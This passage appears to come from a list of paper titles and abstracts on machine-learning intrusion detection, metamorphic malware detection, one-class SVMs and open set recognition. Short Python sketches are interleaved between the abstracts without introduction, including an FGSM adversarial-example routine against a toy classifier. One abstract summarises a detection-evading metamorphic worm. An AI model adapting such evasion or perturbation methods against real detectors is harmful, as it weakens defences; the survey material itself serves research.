restrictions on the structure of the worm. Our design employs previously developed techniques to evade detection. We provide test results to confirm that this worm effectively evades signature and HMM-based detection, and we consider possible detection strategies. This worm provides a concrete example that should prove useful for additional metamorphic detection research. --- paper_title: Opcode graph similarity and metamorphic detection paper_content: In this paper, we consider a method for computing the similarity of executable files, based on opcode graphs. We apply this technique to the challenging problem of metamorphic malware detection and compare the results to previous work based on hidden Markov models. In addition, we analyze the effect of various morphing techniques on the success of our proposed opcode graph-based detection scheme. --- paper_title: Hunting for metamorphic engines paper_content: In this paper, we analyze several metamorphic virus generators. We define a similarity index and use it to precisely quantify the degree of metamorphism that each generator produces. Then we present a detector based on hidden Markov models and we consider a simpler detection method based on our similarity index. Both of these techniques detect all of the metamorphic viruses in our test set with extremely high accuracy. In addition, we show that popular commercial virus scanners do not detect the highly metamorphic virus variants in our test set. --- paper_title: Profile hidden Markov models and metamorphic virus detection paper_content: Metamorphic computer viruses “mutate” by changing their internal structure and, consequently, different instances of the same virus may not exhibit a common signature. 
With the advent of construction kits, it is easy to generate metamorphic strains of a given virus. In contrast to standard hidden Markov models (HMMs), profile hidden Markov models (PHMMs) explicitly account for positional information. In principle, this positional information could yield stronger models for virus detection. However, there are many practical difficulties that arise when using PHMMs, as compared to standard HMMs. PHMMs are widely used in bioinformatics. For example, PHMMs are the most effective tool yet developed for finding family related DNA sequences. In this paper, we consider the utility of PHMMs for detecting metamorphic virus variants generated from virus construction kits. PHMMs are generated for each construction kit under consideration and the resulting models are used to score virus and non-virus files. Our results are encouraging, but several problems must be resolved for the technique to be truly practical. --- paper_title: CODE OBFUSCATION AND VIRUS DETECTION paper_content: Typically, computer viruses and other malware are detected by searching for a string of bits which is found in the virus or malware. Such a string can be viewed as a “fingerprint” of the virus. These “fingerprints” are not generally unique; however they can be used to make rapid malware scanning feasible. This fingerprint is often called a signature and the technique of detecting viruses using signatures is known as signaturebased detection [8]. Today, virus writers often camouflage their viruses by using code obfuscation techniques in an effort to defeat signature-based detection schemes. So-called metamorphic viruses are viruses in which each instance has the same functionality but differs in its internal structure. Metamorphic viruses differ from polymorphic viruses in the method they use to hide their signature. While polymorphic viruses primarily rely on encryption for signature obfuscation, metamorphic viruses hide their signature via “mutating” their own code [3]. The paper [1] provides a rigorous proof that metamorphic viruses can bypass any signature-based detection, provided the code obfuscation has been done carefully based on a set of specified rules. Specifically, according to [1], if dead code is added and the control flow is changed sufficiently by inserting jump statements, the virus cannot be detected. In this project we first developed a code obfuscation engine conforming to the rules in [1]. We then used this engine to create metamorphic variants of a seed virus (created using the PS-MPK virus creation kit [15]) and demonstrated the validity of the assertion --- paper_title: Unsupervised learning techniques for an intrusion detection system paper_content: With the continuous evolution of the types of attacks against computer networks, traditional intrusion detection systems, based on pattern matching and static signatures, are increasingly limited by their need of an up-to-date and comprehensive knowledge base. Data mining techniques have been successfully applied in host-based intrusion detection. Applying data mining techniques on raw network data, however, is made difficult by the sheer size of the input; this is usually avoided by discarding the network packet contents.In this paper, we introduce a two-tier architecture to overcome this problem: the first tier is an unsupervised clustering algorithm which reduces the network packets payload to a tractable size. 
The second tier is a traditional anomaly detection algorithm, whose efficiency is improved by the availability of data on the packet payload content. --- paper_title: Toward Open Set Recognition paper_content: To date, almost all experimental evaluations of machine learning-based recognition algorithms in computer vision have taken the form of “closed set” recognition, whereby all testing classes are known at training time. A more realistic scenario for vision applications is “open set” recognition, where incomplete knowledge of the world is present at training time, and unknown classes can be submitted to an algorithm during testing. This paper explores the nature of open set recognition and formalizes its definition as a constrained minimization problem. The open set recognition problem is not well addressed by existing algorithms because it requires strong generalization. As a step toward a solution, we introduce a novel “1-vs-set machine,” which sculpts a decision space from the marginal distances of a 1-class or binary SVM with a linear kernel. This methodology applies to several different applications in computer vision where open set recognition is a challenging problem, including object recognition and face verification. We consider both in this work, with large scale cross-dataset experiments performed over the Caltech 256 and ImageNet sets, as well as face matching experiments performed over the Labeled Faces in the Wild set. The experiments highlight the effectiveness of machines adapted for open set evaluation compared to existing 1-class and binary SVMs for the same tasks. --- paper_title: Classification and Novel Class Detection in Concept-Drifting Data Streams under Time Constraints paper_content: Most existing data stream classification techniques ignore one important aspect of stream data: arrival of a novel class. We address this issue and propose a data stream classification technique that integrates a novel class detection mechanism into traditional classifiers, enabling automatic detection of novel classes before the true labels of the novel class instances arrive. Novel class detection problem becomes more challenging in the presence of concept-drift, when the underlying data distributions evolve in streams. In order to determine whether an instance belongs to a novel class, the classification model sometimes needs to wait for more test instances to discover similarities among those instances. A maximum allowable wait time Tc is imposed as a time constraint to classify a test instance. Furthermore, most existing stream classification approaches assume that the true label of a data point can be accessed immediately after the data point is classified. In reality, a time delay Tl is involved in obtaining the true label of a data point since manual labeling is time consuming. We show how to make fast and correct classification decisions under these constraints and apply them to real benchmark data. Comparison with state-of-the-art stream classification techniques prove the superiority of our approach. --- paper_title: Data Mining Approaches for Intrusion Detection paper_content: In this paper we discuss our research in developing general and systematic methods for intrusion detection. The key ideas are to use data mining techniques to discover consistent and useful patterns of system features that describe program and user behavior, and use the set of relevant system features to compute (inductively learned) classifiers that can recognize anomalies and known intrusions. 
Using experiments on the sendmail system call data and the network tcpdump data, we demonstrate that we can construct concise and accurate classifiers to detect anomalies. We provide an overview on two general data mining algorithms that we have implemented: the association rules algorithm and the frequent episodes algorithm. These algorithms can be used to compute the intra-and inter-audit record patterns, which are essential in describing program or user behavior. The discovered patterns can guide the audit data gathering process and facilitate feature selection. To meet the challenges of both efficient learning (mining) and real-time detection, we propose an agent-based architecture for intrusion detection systems where the learning agents continuously compute and provide the updated (detection) models to the detection agents. --- paper_title: Decision tree classifier for network intrusion detection with GA-based feature selection paper_content: Machine Learning techniques such as Genetic Algorithms and Decision Trees have been applied to the field of intrusion detection for more than a decade. Machine Learning techniques can learn normal and anomalous patterns from training data and generate classifiers that then are used to detect attacks on computer systems. In general, the input data to classifiers is in a high dimension feature space, but not all of features are relevant to the classes to be classified. In this paper, we use a genetic algorithm to select a subset of input features for decision tree classifiers, with a goal of increasing the detection rate and decreasing the false alarm rate in network intrusion detection. We used the KDDCUP 99 data set to train and test the decision tree classifiers. The experiments show that the resulting decision trees can have better performance than those built with all available features. --- paper_title: Data Streams: Models and Algorithms paper_content: This book primarily discusses issues related to the mining aspects of data streams and it is unique in its primary focus on the subject. This volume covers mining aspects of data streams comprehensively: each contributed chapter contains a survey on the topic, the key ideas in the field for that particular topic, and future research directions. The book is intended for a professional audience composed of researchers and practitioners in industry. This book is also appropriate for advanced-level students in computer science. --- paper_title: Automatic network intrusion detection: Current techniques and open issues paper_content: Automatic network intrusion detection has been an important research topic for the last 20years. In that time, approaches based on signatures describing intrusive behavior have become the de-facto industry standard. Alternatively, other novel techniques have been used for improving automation of the intrusion detection process. In this regard, statistical methods, machine learning and data mining techniques have been proposed arguing higher automation capabilities than signature-based approaches. However, the majority of these novel techniques have never been deployed on real-life scenarios. The fact is that signature-based still is the most widely used strategy for automatic intrusion detection. In the present article we survey the most relevant works in the field of automatic network intrusion detection. In contrast to previous surveys, our analysis considers several features required for truly deploying each one of the reviewed approaches. 
This wider perspective can help us to identify the possible causes behind the lack of acceptance of novel techniques by network security experts. --- paper_title: Feature engineering and classifier ensemble for KDD Cup 2010 paper_content: KDD Cup 2010 is an educational data mining competition. Participants are asked to learn a model from students' past behavior and then predict their future performance. At National Taiwan University, we organized a course for this competition. Most student sub-teams expanded features by various binarization and discretization techniques. The resulting sparse feature sets were trained by logistic regression (using LIBLINEAR). One sub-team considered condensed features using simple statistical techniques and applied Random Forest (through Weka) for training. Initial development was conducted on an internal split of training data for training and validation. We identified some useful feature combinations to improve performance. For the final submission, we combined results of student sub-teams by regularized linear regression. Our team is the first prize winner of both tracks (all teams and student teams) of KDD Cup 2010. --- paper_title: Improving Effectiveness of Intrusion Detection by Correlation Feature Selection paper_content: In this paper, the authors propose a new feature selection procedure for intrusion detection, which is based on filter method used in machine learning. They focus on Correlation Feature Selection (CFS) and transform the problem of feature selection by means of CFS measure into a mixed 0-1 linear programming problem with a number of constraints and variables that is linear in the number of full set features. The mixed 0-1 linear programming problem can then be solved by using branch-and-bound algorithm. This feature selection algorithm was compared experimentally with the best-first-CFS and the genetic-algorithm-CFS methods regarding the feature selection capabilities. Classification accuracies obtained after the feature selection by means of the C4.5 and the BayesNet over the KDD CUP'99 dataset were also tested. Experiments show that the authors' method outperforms the best-first-CFS and the genetic-algorithm-CFS methods by removing much more redundant features while keeping the classification accuracies or getting better performances. --- paper_title: Adaptive Multiagent System for Network Traffic Monitoring paper_content: Individual anomaly-detection methods for monitoring computer network traffic have relatively high error rates. An agent-based trust-modeling system fuses anomaly data and progressively improves classification to achieve acceptable error rates. --- paper_title: Intelligent agents for intrusion detection paper_content: The paper focuses on intrusion detection and countermeasures with respect to widely-used operating systems and networks. The design and architecture of an intrusion detection system built from distributed agents is proposed to implement an intelligent system on which data mining can be performed to provide global, temporal views of an entire networked system. A starting point for agent intelligence in the system is the research into the use of machine learning over system call traces from the privileged sendmail program on UNIX. The authors use a rule learning algorithm to classify the system call traces for intrusion detection purposes and show the results.
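The correlation-based feature selection (CFS) entry above scores a candidate feature subset S by the merit k*r_cf / sqrt(k + k*(k-1)*r_ff), where r_cf is the mean feature-class correlation, r_ff the mean feature-feature correlation, and k = |S|; the cited paper then maximizes this merit through a mixed 0-1 linear program. The sketch below only evaluates that merit with absolute Pearson correlations and brute-forces the subsets of a three-feature toy problem, so it illustrates the objective rather than the paper's branch-and-bound formulation.

```python
import numpy as np
from itertools import combinations

def cfs_merit(X: np.ndarray, y: np.ndarray, subset) -> float:
    """CFS merit = k*r_cf / sqrt(k + k*(k-1)*r_ff) for the given feature indices."""
    k = len(subset)
    # Mean absolute feature-class correlation.
    r_cf = np.mean([abs(np.corrcoef(X[:, j], y)[0, 1]) for j in subset])
    # Mean absolute feature-feature correlation (1.0 by convention when k == 1).
    if k > 1:
        pairs = list(combinations(subset, 2))
        r_ff = np.mean([abs(np.corrcoef(X[:, a], X[:, b])[0, 1]) for a, b in pairs])
    else:
        r_ff = 1.0
    return (k * r_cf) / np.sqrt(k + k * (k - 1) * r_ff)

if __name__ == "__main__":
    rng = np.random.default_rng(0)
    n = 500
    y = rng.integers(0, 2, n).astype(float)
    informative = y + 0.3 * rng.normal(size=n)           # correlated with the class
    redundant = informative + 0.05 * rng.normal(size=n)  # nearly a copy of it
    noise = rng.normal(size=n)                            # unrelated to the class
    X = np.column_stack([informative, redundant, noise])

    # Exhaustive evaluation is fine for 3 features; real datasets need
    # best-first search or the 0-1 LP formulation of the cited paper.
    for r in (1, 2, 3):
        for s in combinations(range(3), r):
            print(s, round(cfs_merit(X, y, s), 3))
```

Redundant features lower the merit through r_ff even when each of them correlates well with the class, which is the behavior the CFS filter exploits.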
--- paper_title: Intrusion detection using neural networks and support vector machines paper_content: Information security is an issue of serious global concern. The complexity, accessibility, and openness of the Internet have served to increase the security risk of information systems tremendously. This paper concerns intrusion detection. We describe approaches to intrusion detection using neural networks and support vector machines. The key ideas are to discover useful patterns or features that describe user behavior on a system, and use the set of relevant features to build classifiers that can recognize anomalies and known intrusions, hopefully in real time. Using a set of benchmark data from a KDD (knowledge discovery and data mining) competition designed by DARPA, we demonstrate that efficient and accurate classifiers can be built to detect intrusions. We compare the performance of neural networks based, and support vector machine based, systems for intrusion detection. --- paper_title: A comparative study of anomaly detection schemes in network intrusion detection paper_content: Intrusion detection corresponds to a suite of techniques that are used to identify attacks against computers and network infrastructures. Anomaly detection is a key element of intrusion detection in which perturbations of normal behavior suggest the presence of intentionally or unintentionally induced attacks, faults, defects, etc. This paper focuses on a detailed comparative study of several anomaly detection schemes for identifying different network intrusions. Several existing supervised and unsupervised anomaly detection schemes and their variations are evaluated on the DARPA 1998 data set of network connections [9] as well as on real network data using existing standard evaluation techniques as well as using several specific metrics that are appropriate when detecting attacks that involve a large number of connections. Our experimental results indicate that some anomaly detection schemes appear very promising when detecting novel intrusions in both DARPA’98 data and real network data. --- paper_title: FEATURE SELECTION FOR INTRUSION DETECTION WITH NEURAL NETWORKS AND SUPPORT VECTOR MACHINES paper_content: Computational intelligence (CI) methods are increasingly being used for problem solving, and CI-type learning machines are being used for intrusion detection. Intrusion detection is a problem of general interest to transportation infrastructure protection, since one of its necessary tasks is to protect the computers responsible for the infrastructure's operational control, and an effective intrusion detection system (IDS) is essential for ensuring network security. Two classes of learning machines for IDSs are studied: artificial neural networks (ANNs) and support vector machines (SVMs). SVMs are shown to be superior to ANNs in three critical respects of IDSs: SVMs train and run an order of magnitude faster; they scale much better; and they give higher classification accuracy. A related issue is ranking the importance of input features, which is itself a problem of great interest. Since elimination of the insignificant (or useless) inputs leads to a simplified problem and possibly faster and more accurate... --- paper_title: RT-UNNID: A practical solution to real-time network-based intrusion detection using unsupervised neural networks paper_content: With the growing rate of network attacks, intelligent methods for detecting new attacks have attracted increasing interest. 
The RT-UNNID system, introduced in this paper, is one such system, capable of intelligent real-time intrusion detection using unsupervised neural networks. Unsupervised neural nets can improve their analysis of new data over time without retraining. In previous work, we evaluated Adaptive Resonance Theory (ART) and Self-Organizing Map (SOM) neural networks using offline data. In this paper, we present a real-time solution using unsupervised neural nets to detect known and new attacks in network traffic. We evaluated our approach using 27 types of attack, and observed 97% precision using ART nets, and 95% precision using SOM nets. --- paper_title: Explaining and Harnessing Adversarial Examples paper_content: Several machine learning models, including neural networks, consistently misclassify adversarial examples---inputs formed by applying small but intentionally worst-case perturbations to examples from the dataset, such that the perturbed input results in the model outputting an incorrect answer with high confidence. Early attempts at explaining this phenomenon focused on nonlinearity and overfitting. We argue instead that the primary cause of neural networks' vulnerability to adversarial perturbation is their linear nature. This explanation is supported by new quantitative results while giving the first explanation of the most intriguing fact about them: their generalization across architectures and training sets. Moreover, this view yields a simple and fast method of generating adversarial examples. Using this approach to provide examples for adversarial training, we reduce the test set error of a maxout network on the MNIST dataset. --- paper_title: Network Intrusion Detection System Using Neural Networks paper_content: This paper presents a neural network-based intrusion detection method for the internet-based attacks on a computer network. Intrusion detection systems (IDS) have been created to predict and thwart current and future attacks. Neural networks are used to identify and predict unusual activities in the system. In particular, feedforward neural networks with the back propagation training algorithm were employed in this study. Training and testing data were obtained from the Defense Advanced Research Projects Agency (DARPA) intrusion detection evaluation data sets. The experimental results on real-data showed promising results on detection intrusion systems using neural networks. --- paper_title: Identifying important features for intrusion detection using support vector machines and neural networks paper_content: Intrusion detection is a critical component of secure information systems. This paper addresses the issue of identifying important input features in building an intrusion detection system (IDS). Since elimination of the insignificant and/or useless inputs leads to a simplification of the problem, faster and more accurate detection may result. Feature ranking and selection, therefore, is an important issue in intrusion detection. We apply the technique of deleting one feature at a time to perform experiments on SVMs and neural networks to rank the importance of input features for the DARPA collected intrusion data. Important features for each of the 5 classes of intrusion patterns in the DARPA data are identified. It is shown that SVM-based and neural network based IDSs using a reduced number of features can deliver enhanced or comparable performance. An IDS for class-specific detection based on five SVMs is proposed. 
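The adversarial-examples entry above ("Explaining and Harnessing Adversarial Examples") introduces the fast gradient sign method (FGSM), which perturbs an input along the sign of the loss gradient: x_adv = x + eps * sign(grad_x L). The sketch below applies that formula to a plain logistic-regression "detector" written in NumPy; the synthetic features, the model, and the value of eps are illustrative stand-ins, not the paper's image classifiers.

```python
import numpy as np

def sigmoid(z):
    return 1.0 / (1.0 + np.exp(-z))

def train_logreg(X, y, lr=0.1, epochs=500):
    """Fit weights and bias of a logistic-regression classifier by gradient descent."""
    w = np.zeros(X.shape[1])
    b = 0.0
    for _ in range(epochs):
        p = sigmoid(X @ w + b)
        w -= lr * (X.T @ (p - y)) / len(y)
        b -= lr * np.mean(p - y)
    return w, b

def fgsm(x, y, w, b, eps):
    """FGSM: x_adv = x + eps * sign(d loss / d x).

    For logistic regression with cross-entropy loss, the input gradient is
    (sigmoid(w.x + b) - y) * w.
    """
    grad_x = (sigmoid(x @ w + b) - y) * w
    return x + eps * np.sign(grad_x)

if __name__ == "__main__":
    rng = np.random.default_rng(1)
    # Toy two-class data: "benign" around -1, "attack" around +1 in each feature.
    X = np.vstack([rng.normal(-1, 1, (200, 5)), rng.normal(+1, 1, (200, 5))])
    y = np.array([0] * 200 + [1] * 200, dtype=float)
    w, b = train_logreg(X, y)

    x = X[0]                                   # a benign point
    x_adv = fgsm(x, y[0], w, b, eps=0.5)
    print("clean score:      ", sigmoid(x @ w + b))
    print("adversarial score:", sigmoid(x_adv @ w + b))  # pushed toward class 1
```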
--- paper_title: Deep neural networks are easily fooled: High confidence predictions for unrecognizable images paper_content: Deep neural networks (DNNs) have recently been achieving state-of-the-art performance on a variety of pattern-recognition tasks, most notably visual classification problems. Given that DNNs are now able to classify objects in images with near-human-level performance, questions naturally arise as to what differences remain between computer and human vision. A recent study [30] revealed that changing an image (e.g. of a lion) in a way imperceptible to humans can cause a DNN to label the image as something else entirely (e.g. mislabeling a lion a library). Here we show a related result: it is easy to produce images that are completely unrecognizable to humans, but that state-of-the-art DNNs believe to be recognizable objects with 99.99% confidence (e.g. labeling with certainty that white noise static is a lion). Specifically, we take convolutional neural networks trained to perform well on either the ImageNet or MNIST datasets and then find images with evolutionary algorithms or gradient ascent that DNNs label with high confidence as belonging to each dataset class. It is possible to produce images totally unrecognizable to human eyes that DNNs believe with near certainty are familiar objects, which we call “fooling images” (more generally, fooling examples). Our results shed light on interesting differences between human vision and current DNNs, and raise questions about the generality of DNN computer vision. --- paper_title: A new approach to intrusion detection using Artificial Neural Networks and fuzzy clustering paper_content: Many researches have argued that Artificial Neural Networks (ANNs) can improve the performance of intrusion detection systems (IDS) when compared with traditional methods. However for ANN-based IDS, detection precision, especially for low-frequent attacks, and detection stability are still needed to be enhanced. In this paper, we propose a new approach, called FC-ANN, based on ANN and fuzzy clustering, to solve the problem and help IDS achieve higher detection rate, less false positive rate and stronger stability. The general procedure of FC-ANN is as follows: firstly fuzzy clustering technique is used to generate different training subsets. Subsequently, based on different training subsets, different ANN models are trained to formulate different base models. Finally, a meta-learner, fuzzy aggregation module, is employed to aggregate these results. Experimental results on the KDD CUP 1999 dataset show that our proposed new approach, FC-ANN, outperforms BPNN and other well-known methods such as decision tree, the naive Bayes in terms of detection precision and detection stability. --- paper_title: A Self-organized Agent-based architecture for Power-aware Intrusion Detection in wireless ad-hoc networks paper_content: In this paper we propose SAPID-A Self-organized Agent-based architecture for Power-aware Intrusion Detection in wireless ad-hoc networks. We utilize an agent-based architecture that conserves the available bandwidth and segregates SAPID into two phases. Based on a power level metric and a hybrid metric that determine the duration and kinds of traffic that can be supported by a network-monitoring node, potential ad-hoc hosts are identified by repetitive training using an Adaptive Resonance Theory module. 
The agent architecture primarily consists of a Kohonen Self-Organizing Map to identify the appropriate patterns and recognize anomalies by way of unauthorized users in the network. A UNIX based session information file is utilized for testing and reporting possible intrusion attempts to the decision and action modules. Comprehensive experiments were carried out to clearly delineate and analyze the performance of the architecture. --- paper_title: Outside the Closed World: On Using Machine Learning for Network Intrusion Detection paper_content: In network intrusion detection research, one popular strategy for finding attacks is monitoring a network's activity for anomalies: deviations from profiles of normality previously learned from benign traffic, typically identified using tools borrowed from the machine learning community. However, despite extensive academic research one finds a striking gap in terms of actual deployments of such systems: compared with other intrusion detection approaches, machine learning is rarely employed in operational "real world" settings. We examine the differences between the network intrusion detection problem and other areas where machine learning regularly finds much more success. Our main claim is that the task of finding attacks is fundamentally different from these other applications, making it significantly harder for the intrusion detection community to employ machine learning effectively. We support this claim by identifying challenges particular to network intrusion detection, and provide a set of guidelines meant to strengthen future research on anomaly detection. --- paper_title: Bayesian Networks and Decision Graphs paper_content: Probabilistic graphical models and decision graphs are powerful modeling tools for reasoning and decision making under uncertainty. As modeling languages they allow a natural specification of problem domains with inherent uncertainty, and from a computational perspective they support efficient algorithms for automatic construction and query answering. This includes belief updating, finding the most probable explanation for the observed evidence, detecting conflicts in the evidence entered into the network, determining optimal strategies, analyzing for relevance, and performing sensitivity analysis. The book introduces probabilistic graphical models and decision graphs, including Bayesian networks and influence diagrams. The reader is introduced to the two types of frameworks through examples and exercises, which also instruct the reader on how to build these models. The book is a new edition of Bayesian Networks and Decision Graphs by Finn V. Jensen. The new edition is structured into two parts. The first part focuses on probabilistic graphical models. Compared with the previous book, the new edition also includes a thorough description of recent extensions to the Bayesian network modeling language, advances in exact and approximate belief updating algorithms, and methods for learning both the structure and the parameters of a Bayesian network. The second part deals with decision graphs, and in addition to the frameworks described in the previous edition, it also introduces Markov decision processes and partially ordered decision problems. The authors also provide a well-founded practical introduction to Bayesian networks, object-oriented Bayesian networks, decision trees, influence diagrams (and variants hereof), and Markov decision processes. 
They give practical advice on the construction of Bayesian networks, decision trees, and influence diagrams from domain knowledge, give several examples and exercises exploiting computer systems for dealing with Bayesian networks and decision graphs, and present a thorough introduction to state-of-the-art solution and analysis algorithms. The book is intended as a textbook, but it can also be used for self-study and as a reference book. --- paper_title: Letters: A hierarchical intrusion detection model based on the PCA neural networks paper_content: Most existing intrusion detection (ID) models with a single-level structure can only detect either misuse or anomaly attacks. A hierarchical ID model using principal component analysis (PCA) neural networks is proposed to overcome such shortcomings. In the proposed model, PCA is applied for classification and neural networks are used for online computing. Experimental results and comparative studies based on the 1998 DARPA evaluation data sets are given, which show the proposed model can classify the network connections with satisfying performance. --- paper_title: Extreme Value Distributions: Theory and Applications paper_content: Univariate extreme value distributions; generalized extreme value distributions; multivariate extreme value distributions. --- paper_title: Improving one-class SVM for anomaly detection paper_content: With the tremendous growth of the Internet, information system security has become an issue of serious global concern due to the rapid connection and accessibility. Developing effective methods for intrusion detection, therefore, is an urgent task for assuring computer & information system security. Since most attacks and misuses can be recognized through the examination of system audit log files and pattern analysis therein, an approach for intrusion detection can be built on them. We first made a deep analysis of attack and misuse patterns in log files, and then proposed an approach using support vector machines for anomaly detection. It is a one-class SVM based approach, trained with abstracted user audit log data from the 1999 DARPA data. --- paper_title: Anomaly Intrusion Detection Using Incremental Learning of an Infinite Mixture Model with Feature Selection paper_content: We propose an incremental nonparametric Bayesian approach for clustering. Our approach is based on a Dirichlet process mixture of generalized Dirichlet (GD) distributions. Unlike classic clustering approaches, our model does not require the number of clusters to be pre-defined. 
Moreover, an unsupervised feature selection scheme is integrated into the proposed nonparametric framework to improve clustering performance. By learning the proposed model using an incremental variational framework, the number of clusters as well as the features weights can be automatically and simultaneously computed. The effectiveness and merits of the proposed approach are investigated on a challenging application namely anomaly intrusion detection. --- paper_title: Host-Based Intrusion Detection Using Dynamic and Static Behavioral Models paper_content: Intrusion detection has emerged as an important approach to network security. In this paper, we adopt an anomaly detection approach by detecting possible intrusions based on program or user profiles built from normal usage data. In particular, program profiles based on Unix system calls and user profiles based on Unix shell commands are modeled using two different types of behavioral models for data mining. The dynamic modeling approach is based on hidden Markov models (HMM) and the principle of maximum likelihood, while the static modeling approach is based on event occurrence frequency distributions and the principle of minimum cross entropy. The novelty detection approach is adopted to estimate the model parameters using normal training data only, as opposed to the classification approach which has to use both normal and intrusion data for training. To determine whether or not a certain behavior is similar enough to the normal model and hence should be classified as normal, we use a scheme that can be justified from the perspective of hypothesis testing. Our experimental results show that the dynamic modeling approach is better than the static modeling approach for the system call datasets, while the dynamic modeling approach is worse for the shell command datasets. Moreover, the static modeling approach is similar in performance to instance-based learning reported previously by others for the same shell command database but with much higher computational and storage requirements than our method. --- paper_title: Anomaly intrusion detection using one class SVM paper_content: Kernel methods are widely used in statistical learning for many fields, such as protein classification and image processing. We recently extend kernel methods to intrusion detection domain by introducing a new family of kernels suitable for intrusion detection. These kernels, combined with an unsupervised learning method - one-class support vector machine, are used for anomaly detection. Our experiments show that the new anomaly detection methods are able to achieve better accuracy rates than the conventional anomaly detectors. --- paper_title: Enhancing one-class support vector machines for unsupervised anomaly detection paper_content: Support Vector Machines (SVMs) have been one of the most successful machine learning techniques for the past decade. For anomaly detection, also a semi-supervised variant, the one-class SVM, exists. Here, only normal data is required for training before anomalies can be detected. In theory, the one-class SVM could also be used in an unsupervised anomaly detection setup, where no prior training is conducted. Unfortunately, it turns out that a one-class SVM is sensitive to outliers in the data. In this work, we apply two modifications in order to make one-class SVMs more suitable for unsupervised anomaly detection: Robust one-class SVMs and eta one-class SVMs. 
The key idea of both modifications is that outliers should contribute less to the decision boundary than normal instances. Experiments performed on datasets from the UCI machine learning repository show that our modifications are very promising: compared with other standard unsupervised anomaly detection algorithms, the enhanced one-class SVMs are superior on two out of four datasets. In particular, the proposed eta one-class SVM has shown the most promising results. --- paper_title: Toward Open Set Recognition paper_content: To date, almost all experimental evaluations of machine learning-based recognition algorithms in computer vision have taken the form of “closed set” recognition, whereby all testing classes are known at training time. A more realistic scenario for vision applications is “open set” recognition, where incomplete knowledge of the world is present at training time, and unknown classes can be submitted to an algorithm during testing. This paper explores the nature of open set recognition and formalizes its definition as a constrained minimization problem. The open set recognition problem is not well addressed by existing algorithms because it requires strong generalization. As a step toward a solution, we introduce a novel “1-vs-set machine,” which sculpts a decision space from the marginal distances of a 1-class or binary SVM with a linear kernel. This methodology applies to several different applications in computer vision where open set recognition is a challenging problem, including object recognition and face verification. We consider both in this work, with large scale cross-dataset experiments performed over the Caltech 256 and ImageNet sets, as well as face matching experiments performed over the Labeled Faces in the Wild set. The experiments highlight the effectiveness of machines adapted for open set evaluation compared to existing 1-class and binary SVMs for the same tasks. --- paper_title: Multi-class Open Set Recognition Using Probability of Inclusion paper_content: The perceived success of recent visual recognition approaches has largely been derived from their performance on classification tasks, where all possible classes are known at training time. But what about open set problems, where unknown classes appear at test time? Intuitively, if we could accurately model just the positive data for any known class without overfitting, we could reject the large set of unknown classes even under an assumption of incomplete class knowledge. In this paper, we formulate the problem as one of modeling positive training data at the decision boundary, where we can invoke the statistical extreme value theory. A new algorithm called the PI-SVM is introduced for estimating the unnormalized posterior probability of class inclusion. --- paper_title: On-Line Unsupervised Outlier Detection Using Finite Mixtures with Discounting Learning Algorithms paper_content: Outlier detection is a fundamental issue in data mining, specifically in fraud detection, network intrusion detection, network monitoring, etc. SmartSifter is an outlier detection engine addressing this problem from the viewpoint of statistical learning theory. This paper provides a theoretical basis for SmartSifter and empirically demonstrates its effectiveness. SmartSifter detects outliers in an on-line process through the on-line unsupervised learning of a probabilistic model (using a finite mixture model) of the information source. 
Each time a datum is input, SmartSifter employs an on-line discounting learning algorithm to learn the probabilistic model. A score is given to the datum based on the learned model, with a high score indicating a high possibility of being a statistical outlier. The novel features of SmartSifter are: (1) it is adaptive to non-stationary sources of data; (2) a score has a clear statistical/information-theoretic meaning; (3) it is computationally inexpensive; and (4) it can handle both categorical and continuous variables. An experimental application to network intrusion detection shows that SmartSifter was able to identify data with high scores that corresponded to attacks, with low computational costs. Further experimental application has identified a number of meaningful rare cases in actual health insurance pathology data from Australia's Health Insurance Commission. --- paper_title: Traffic classification and verification using unsupervised learning of Gaussian Mixture Models paper_content: This paper presents the use of unsupervised Gaussian Mixture Models (GMMs) for the production of per-application models using their flows' statistics in order to be exploited in two different scenarios: (i) traffic classification, where the goal is to classify traffic flows by application, and (ii) traffic verification or traffic anomaly detection, where the aim is to confirm whether or not traffic flow generated by the claimed application conforms to its expected model. Unlike the first scenario, the second one is a new research path that has received less attention in the scope of Intrusion Detection System (IDS) research. The term “unsupervised” refers to the method's ability to select the optimal number of components automatically without the need for careful initialization. Experiments are carried out using a public dataset collected from a real network. Favorable results indicate the effectiveness of unsupervised GMMs. --- paper_title: Probability Models for Open Set Recognition paper_content: Real-world tasks in computer vision often touch upon open set recognition: multi-class recognition with incomplete knowledge of the world and many unknown inputs. Recent work on this problem has proposed a model incorporating an open space risk term to account for the space beyond the reasonable support of known classes. This paper extends the general idea of open space risk limiting classification to accommodate non-linear classifiers in a multi-class setting. We introduce a new open set recognition model called compact abating probability (CAP), where the probability of class membership decreases in value (abates) as points move from known data toward open space. We show that CAP models improve open set recognition for multiple algorithms. Leveraging the CAP formulation, we go on to describe the novel Weibull-calibrated SVM (W-SVM) algorithm, which combines the useful properties of statistical extreme value theory for score calibration with one-class and binary support vector machines. Our experiments show that the W-SVM is significantly better for open set object detection and OCR problems when compared to the state-of-the-art for the same tasks. --- paper_title: Estimating the Support of a High-Dimensional Distribution paper_content: Suppose you are given some data set drawn from an underlying probability distribution P and you want to estimate a "simple" subset S of input space such that the probability that a test point drawn from P lies outside of S equals some a priori specified value between 0 and 1. 
We propose a method to approach this problem by trying to estimate a function f that is positive on S and negative on the complement. The functional form of f is given by a kernel expansion in terms of a potentially small subset of the training data; it is regularized by controlling the length of the weight vector in an associated feature space. The expansion coefficients are found by solving a quadratic programming problem, which we do by carrying out sequential optimization over pairs of input patterns. We also provide a theoretical analysis of the statistical performance of our algorithm. The algorithm is a natural extension of the support vector algorithm to the case of unlabeled data. --- paper_title: An Adaptive Weighted One-Class SVM for Robust Outlier Detection paper_content: This paper focuses on outlier detection from the perspective of classification. The one-class support vector machine (OCSVM) is a widely applied and effective method of outlier detection. Unfortunately, experiments show that the standard one-class SVM is easily influenced by outliers contained in the training dataset. To cope with this problem, a robust OCSVM is presented in this paper. Since outlying instances and normal data contribute differently, a robust one-class SVM that assigns an adaptive weight to every object in the training dataset is proposed. Experimental analysis shows that the proposed weighted method is more robust than the conventional one-class SVM. --- paper_title: Towards Open World Recognition paper_content: With the advent of rich classification models and high computational power, visual recognition systems have found many operational applications. Recognition in the real world poses multiple challenges that are not apparent in controlled lab environments. The datasets are dynamic and novel categories must be continuously detected and then added. At prediction time, a trained system has to deal with myriad unseen categories. Operational systems require minimal downtime, even to learn. To handle these operational issues, we present the problem of Open World Recognition and formally define it. We prove that thresholding sums of monotonically decreasing functions of distances in linearly transformed feature space can balance “open space risk” and empirical risk. Our theory extends existing algorithms for open world recognition. We present a protocol for evaluation of open world recognition systems. We present the 